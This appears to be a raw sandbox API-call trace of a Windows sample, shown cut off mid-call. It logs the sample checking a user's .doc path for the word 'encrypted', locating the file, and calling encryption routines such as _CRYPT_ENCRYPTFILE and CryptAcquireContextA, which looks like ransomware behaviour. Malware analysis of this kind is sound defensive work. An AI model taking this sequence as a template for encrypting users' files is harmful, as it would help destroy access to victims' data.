lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ro_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TXVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XVbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VbfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bfxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fxNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xNeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NeSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SRqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RqjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qjbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jbX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bX46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="46\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="guwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uwDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wDP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DP36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="36jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jwcK.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0034.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0034.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0034.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0034.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.031] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.031] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0034.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0034.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.032] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0034.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0034.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.032] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="doc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0034.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0034.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0034.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0034.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0034.032] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.032] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.032] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.032] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.032] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.032] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89fa99d0, ftCreationTime.dwHighDateTime=0x1d5b7a0, ftLastAccessTime.dwLowDateTime=0x3ddb67b0, ftLastAccessTime.dwHighDateTime=0x1d5c429, ftLastWriteTime.dwLowDateTime=0x3ddb67b0, ftLastWriteTime.dwHighDateTime=0x1d5c429, nFileSizeHigh=0x0, nFileSizeLow=0x1271, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="guwDP36jwcK.doc", cAlternateFileName="GUWDP3~1.DOC")) returned 0x7c2100 [0034.032] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0034.032] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.032] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.032] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.032] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.032] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0034.033] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.033] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0034.033] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.033] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.033] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0034.033] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.033] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.033] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.033] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.033] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.033] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0034.033] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.033] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0034.034] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.034] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.034] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0034.034] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.034] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.034] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.034] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.034] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.034] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.034] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.034] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.034] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.034] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.034] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.035] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.035] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0034.035] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, 